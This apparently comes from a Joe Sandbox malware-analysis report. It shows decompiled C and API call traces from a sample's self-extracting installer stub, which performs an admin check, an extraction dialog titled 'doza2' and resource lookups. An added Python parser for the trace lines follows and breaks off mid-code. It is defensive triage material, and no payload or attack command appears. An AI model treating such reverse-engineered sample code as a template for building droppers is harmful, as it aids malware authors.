                                                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00406CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x0040188a
                                                                                                                                                                                                                                    0x0040188a
                                                                                                                                                                                                                                    0x004018a2

APIs
• LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
• GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040182C
• AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
• FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
• FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
• Instruction ID: 1bd3692ccccaa6d7600f9d0fef09d9c741b671f303ea2036aeae9e10c16a3b59
• Opcode Fuzzy Hash: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
• Instruction Fuzzy Hash: 35119631E00309ABDB14AFA4DD49ABFBB78EF48704F10417AFA01F2390DA748D148B99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00406CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x406e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00406E26,00401000), ref: 00406CF7
• UnhandledExceptionFilter.KERNEL32(&n@,?,00406E26,00401000), ref: 00406D00
• GetCurrentProcess.KERNEL32(C0000409,?,00406E26,00401000), ref: 00406D0B
• TerminateProcess.KERNEL32(00000000,?,00406E26,00401000), ref: 00406D12
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID: &n@
• API String ID: 3231755760-1310975225
• Opcode ID: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
• Instruction ID: 8cb3f13b78dd38f3b5ff2bea80fcfbd25beb2721d0077c0a29712bb6dc75ce69
• Opcode Fuzzy Hash: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
• Instruction Fuzzy Hash: 87D0C932000308BBDB002BE1EE0CE593F28EB48212F444020F719AA020CA3244618B5B
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00407155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x408004; // 0x8f135e3b
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x408004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x408004 = _t39;
				}
				_t37 =  !_t36;
				 *0x408008 = _t37;
				return _t37;
			}

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
• GetCurrentProcessId.KERNEL32 ref: 00407191
• GetCurrentThreadId.KERNEL32 ref: 0040719A
• GetTickCount.KERNEL32 ref: 004071A3
• QueryPerformanceCounter.KERNEL32(?), ref: 004071B8
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
• Instruction ID: bfdbf58dd1f09331b2ef62520d31486fb2a653da5464fc683e2cb64336e098ce
• Opcode Fuzzy Hash: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
• Instruction Fuzzy Hash: CF112871D012089BCB10DBB8DB48A9EB7F4EB08314F65486AD801EB250EA349E148B49
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406F40() {

	SetUnhandledExceptionFilter(E00406EF0);
	return 0;
}




APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00006EF0), ref: 00406F45
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
• Instruction ID: 378a529128b3a7e3d1065d46846c981e64e6a00043b7090dbb000319764bf95a
• Opcode Fuzzy Hash: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
• Instruction Fuzzy Hash: DD90027425130047D6101B70DE1991975A15B4D602B925475A012E84D5DB744060659A
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Offset: 06902000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6902000_szDGo5lHdI.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction ID: 0322fd71d05bdf4ab1a9c93562562e6c37cbdd28eab3d9ea3274383c2ce677e2
• Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction Fuzzy Hash: 6011A172340200AFE794DF55DCD4FA673EAEB89320B298065ED08CB756D676ED42C760
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 76%
E00403210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
	void* __edi;
	void* _t6;
	void* _t10;
	int _t20;
	int _t21;
	int _t23;
	char _t24;
	long _t25;
	int _t27;
	int _t30;
	void* _t32;
	int _t33;
	int _t34;
	int _t37;
	int _t38;
	int _t39;
	void* _t42;
	void* _t46;
	CHAR* _t49;
	void* _t58;
	void* _t63;
	struct HWND__* _t64;

	_t64 = _a4;
	_t6 = _a8 - 0x10;
	if(_t6 == 0) {
		_push(0);
		L38:
		EndDialog(_t64, ??);
		L39:
		__eflags = 1;
		return 1;
	}
	_t42 = 1;
	_t10 = _t6 - 0x100;
	if(_t10 == 0) {
		E004043D0(_t64, GetDesktopWindow());
		SetWindowTextA(_t64, "doza2");
		SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
		__eflags =  *0x409a40 - _t42; // 0x3
		if(__eflags == 0) {
			EnableWindow(GetDlgItem(_t64, 0x836), 0);
		}
		L36:
		return _t42;
	}
	if(_t10 == _t42) {
		_t20 = _a12 - 1;
		__eflags = _t20;
		if(_t20 == 0) {
			_t21 = GetDlgItemTextA(_t64, 0x835, 0x4091e4, 0x104);
			__eflags = _t21;
			if(_t21 == 0) {
				L32:
				_t58 = 0x4bf;
				_push(0);
				_push(0x10);
				_push(0);
				_push(0);
				L25:
				E004044B9(_t64, _t58);
				goto L39;
			}
			_t49 = 0x4091e4;
			do {
				_t23 =  *_t49;
				_t49 =  &(_t49[1]);
				__eflags = _t23;
			} while (_t23 != 0);
			__eflags = _t49 - 0x4091e5 - 3;
                                                                                                                                                                                                                                    						if(_t49 - 0x4091e5 < 3) {
                                                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t24 =  *0x4091e5; // 0x3a
                                                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0x4091e4);
                                                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                                                    								E0040658A(0x4091e4, 0x104, 0x401140);
                                                                                                                                                                                                                                    								_t27 = E004058C8(0x4091e4);
                                                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                                                    									__eflags =  *0x4091e4 - 0x5c;
                                                                                                                                                                                                                                    									if( *0x4091e4 != 0x5c) {
                                                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                                                    										_t30 = E0040597D(0x4091e4, 1, _t64, 1);
                                                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags =  *0x4091e5 - 0x5c;
                                                                                                                                                                                                                                    									if( *0x4091e5 == 0x5c) {
                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t32 = E004044B9(_t64, 0x54a, 0x4091e4, 0, 0x20, 4);
                                                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0x4091e4, 0);
                                                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(0x4091e4);
                                                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags =  *0x4091e4 - 0x5c;
                                                                                                                                                                                                                                    						if( *0x4091e4 != 0x5c) {
                                                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                                                    						 *0x409124 = 0x800704c7;
                                                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t37 = LoadStringA( *0x409a3c, 0x3e8, 0x408598, 0x200);
                                                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                                                    						_t38 = E00404224(_t64, _t46, _t46);
                                                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x4087a0);
                                                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						E004044B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00403243
                                                                                                                                                                                                                                    0x00403243
                                                                                                                                                                                                                                    0x00403246
                                                                                                                                                                                                                                    0x004032ee
                                                                                                                                                                                                                                    0x004032f4
                                                                                                                                                                                                                                    0x004032f6
                                                                                                                                                                                                                                    0x004033d4
                                                                                                                                                                                                                                    0x004033d6
                                                                                                                                                                                                                                    0x004033db
                                                                                                                                                                                                                                    0x004033dc
                                                                                                                                                                                                                                    0x004033de
                                                                                                                                                                                                                                    0x004033df
                                                                                                                                                                                                                                    0x00403370
                                                                                                                                                                                                                                    0x00403372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403372
                                                                                                                                                                                                                                    0x004032fc
                                                                                                                                                                                                                                    0x00403301
                                                                                                                                                                                                                                    0x00403301
                                                                                                                                                                                                                                    0x00403303
                                                                                                                                                                                                                                    0x00403304
                                                                                                                                                                                                                                    0x00403304
                                                                                                                                                                                                                                    0x0040330a
                                                                                                                                                                                                                                    0x0040330d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403313
                                                                                                                                                                                                                                    0x00403318
                                                                                                                                                                                                                                    0x0040331a
                                                                                                                                                                                                                                    0x00403331
                                                                                                                                                                                                                                    0x00403332
                                                                                                                                                                                                                                    0x0040333a
                                                                                                                                                                                                                                    0x0040333d
                                                                                                                                                                                                                                    0x0040337c
                                                                                                                                                                                                                                    0x00403388
                                                                                                                                                                                                                                    0x0040338f
                                                                                                                                                                                                                                    0x00403394
                                                                                                                                                                                                                                    0x00403396
                                                                                                                                                                                                                                    0x004033a4
                                                                                                                                                                                                                                    0x004033ab
                                                                                                                                                                                                                                    0x004033b6
                                                                                                                                                                                                                                    0x004033be
                                                                                                                                                                                                                                    0x004033c3
                                                                                                                                                                                                                                    0x004033c5
                                                                                                                                                                                                                                    0x00403435
                                                                                                                                                                                                                                    0x00403437
                                                                                                                                                                                                                                    0x00403437
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403437
                                                                                                                                                                                                                                    0x004033c7
                                                                                                                                                                                                                                    0x004033c9
                                                                                                                                                                                                                                    0x004033cc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004033cc
                                                                                                                                                                                                                                    0x004033ad
                                                                                                                                                                                                                                    0x004033b4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004033b4
                                                                                                                                                                                                                                    0x00403398
                                                                                                                                                                                                                                    0x00403399
                                                                                                                                                                                                                                    0x0040339b
                                                                                                                                                                                                                                    0x0040339c
                                                                                                                                                                                                                                    0x0040339d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040339d
                                                                                                                                                                                                                                    0x0040334c
                                                                                                                                                                                                                                    0x00403351
                                                                                                                                                                                                                                    0x00403354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040335c
                                                                                                                                                                                                                                    0x00403362
                                                                                                                                                                                                                                    0x00403364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403366
                                                                                                                                                                                                                                    0x00403367
                                                                                                                                                                                                                                    0x00403369
                                                                                                                                                                                                                                    0x0040336a
                                                                                                                                                                                                                                    0x0040336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040336b
                                                                                                                                                                                                                                    0x0040331c
                                                                                                                                                                                                                                    0x00403323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403329
                                                                                                                                                                                                                                    0x0040332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040332b
                                                                                                                                                                                                                                    0x0040324c
                                                                                                                                                                                                                                    0x0040324c
                                                                                                                                                                                                                                    0x0040324f
                                                                                                                                                                                                                                    0x004032c8
                                                                                                                                                                                                                                    0x004032ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004032ce
                                                                                                                                                                                                                                    0x00403251
                                                                                                                                                                                                                                    0x00403256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403271
                                                                                                                                                                                                                                    0x00403277
                                                                                                                                                                                                                                    0x00403279
                                                                                                                                                                                                                                    0x00403298
                                                                                                                                                                                                                                    0x0040329d
                                                                                                                                                                                                                                    0x0040329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004032b0
                                                                                                                                                                                                                                    0x004032b6
                                                                                                                                                                                                                                    0x004032b8
0x00000000
0x00000000
0x004032be
0x00403280
0x00403289
0x0040328e
0x00000000
0x0040328e
0x0040327b
0x00000000
0x0040327b
0x00000000

APIs
• LoadStringA.USER32(000003E8,00408598,00000200), ref: 00403271
• GetDesktopWindow.USER32 ref: 004033E2
• SetWindowTextA.USER32(?,doza2), ref: 004033F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00403410
• GetDlgItem.USER32(?,00000836), ref: 00403426
• EnableWindow.USER32(00000000), ref: 0040342D
• EndDialog.USER32(?,00000000), ref: 0040343F
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$doza2
• API String ID: 2418873061-2567452070
• Opcode ID: ec0898f5d764152806d941a8be05ff3854ee7734cea54d763d8cbd8109858449
• Instruction ID: 04d5c2a8db134baef30f0d0166c5a423a0fa44611ce3e06c27fd7db4b1552688
• Opcode Fuzzy Hash: ec0898f5d764152806d941a8be05ff3854ee7734cea54d763d8cbd8109858449
• Instruction Fuzzy Hash: 7551E47034024176E7215F365D8CF7B2D5D9B86B56F10403AFA45BA2D1CABC8E02926E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00402CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t13;
	void* _t20;
	void* _t23;
	void* _t27;
	struct HRSRC__* _t31;
	intOrPtr _t33;
	void* _t43;
	void* _t48;
	signed int _t65;
	struct HINSTANCE__* _t66;
	signed int _t67;

	_t13 =  *0x408004; // 0x8f135e3b
	_v8 = _t13 ^ _t67;
	_t65 = 0;
	_t66 = __ecx;
	_t48 = __edx;
	 *0x409a3c = __ecx;
	memset(0x409140, 0, 0x8fc);
	memset(0x408a20, 0, 0x32c);
	memset(0x4088c0, 0, 0x104);
	 *0x4093ec = 1;
	_t20 = E0040468F("TITLE", 0x409154, 0x7f);
	if(_t20 == 0 || _t20 > 0x80) {
		_t64 = 0x4b1;
		goto L32;
	} else {
		_t27 = CreateEventA(0, 1, 1, 0);
		 *0x40858c = _t27;
		SetEvent(_t27);
		_t64 = 0x409a34;
		if(E0040468F("EXTRACTOPT", 0x409a34, 4) != 0) {
			if(( *0x409a34 & 0x000000c0) == 0) {
				L12:
				 *0x409120 =  *0x409120 & _t65;
				if(E00405C9E(_t48, _t48, _t65, _t66) != 0) {
					if( *0x408a3a == 0) {
						_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
						if(_t31 != 0) {
							_t65 = LoadResource(_t66, _t31);
						}
						if( *0x408184 != 0) {
							__imp__#17();
						}
						if( *0x408a24 == 0) {
							_t57 = _t65;
							if(E004036EE(_t65) == 0) {
								goto L33;
							} else {
								_t33 =  *0x409a40; // 0x3
								_t48 = 1;
								if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
									if(( *0x409a34 & 0x00000100) == 0 || ( *0x408a38 & 0x00000001) != 0 || E004018A3(_t64, _t66) != 0) {
										goto L30;
									} else {
										_t64 = 0x7d6;
										if(E00406517(_t57, 0x7d6, _t34, E004019E0, 0x547, 0x83e) != 0x83d) {
											goto L33;
										} else {
											goto L30;
										}
									}
								} else {
									L30:
									_t23 = _t48;
								}
							}
						} else {
							_t23 = 1;
						}
					} else {
						E00402390(0x408a3a);
						goto L33;
					}
				} else {
					_t64 = 0x520;
					L32:
					E004044B9(0, _t64, 0, 0, 0x10, 0);
					goto L33;
				}
			} else {
				_t64 =  &_v268;
				if(E0040468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
					goto L3;
				} else {
					_t43 = CreateMutexA(0, 1,  &_v268);
					 *0x408588 = _t43;
					if(_t43 == 0 || GetLastError() != 0xb7) {
						goto L12;
					} else {
						if(( *0x409a34 & 0x00000080) == 0) {
							_t64 = 0x524;
							if(E004044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
								goto L12;
							} else {
								goto L11;
							}
						} else {
                                                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                                                    										E004044B9(0, 0x54b, "doza2", 0, 0x10, 0);
                                                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                                                    										CloseHandle( *0x408588);
                                                                                                                                                                                                                                    										 *0x409124 = 0x800700b7;
                                                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                                                    						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00406CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                    			}
0x00402cb5
0x00402cbc
0x00402cc7
0x00402cc9
0x00402cd1
0x00402cd3
0x00402cd9
0x00402ce9
0x00402cf9
0x00402d0e
0x00402d15
0x00402d1c
0x00402ef3
0x00000000
0x00402d2d
0x00402d34
0x00402d3b
0x00402d40
0x00402d48
0x00402d59
0x00402d84
0x00402e1f
0x00402e1f
0x00402e2e
0x00402e41
0x00402e5a
0x00402e62
0x00402e6c
0x00402e6c
0x00402e75
0x00402e77
0x00402e77
0x00402e84
0x00402e8b
0x00402e94
0x00000000
0x00402e96
0x00402e96
0x00402e9e
0x00402ea2
0x00402eba
0x00000000
0x00402ece
0x00402ede
0x00402eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00402eed
0x00402eef
0x00402eef
0x00402eef
0x00402eef
0x00402ea2
0x00402e86
0x00402e88
0x00402e88
0x00402e43
0x00402e48
0x00000000
0x00402e48
0x00402e30
0x00402e30
0x00402ef8
0x00402f01
0x00000000
0x00402f01
0x00402d8a
0x00402d8f
0x00402da1
0x00000000
0x00402da3
0x00402dae
0x00402db4
0x00402dbb
0x00000000
0x00402dca
0x00402dd3
0x00402df5
0x00402e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00402dd5
0x00402dde
0x00402de3
0x00402e04
0x00402e0a
0x00402e10
0x00000000
0x00402e10
0x00402dd3
0x00402dbb
0x00402da1
0x00402d5b
0x00402d5b
0x00402d5d
0x00402d69
0x00402d6e
0x00402f06
0x00402f06
0x00402f06
0x00402d59
0x00402f18

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CD9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CF9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D34
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D40
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402DAE
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00402DBD
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402E0A
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
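The API list above is the sandbox's own call-trace format: an optional "Part of subcall function" prefix, the API and its module, the argument window the sandbox captured, and the call-site address. As an added example (not part of the report, the sample, or Joe Sandbox), the Python below parses those lines into structured records and reduces them to the facts an analyst pulls out by hand: which resources the stub looks up (name and type), which string literals reach an API, and whether the created kernel objects are named. The sample lines are copied from the list above; the resource-type table and the lpName parameter indices are assumptions taken from the documented Win32 signatures, and the observation that values past an API's real arity are caller stack noise is a general caveat about this trace format, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

Arg = Union[int, str]        # int for values the sandbox resolved, str for literals or "?"
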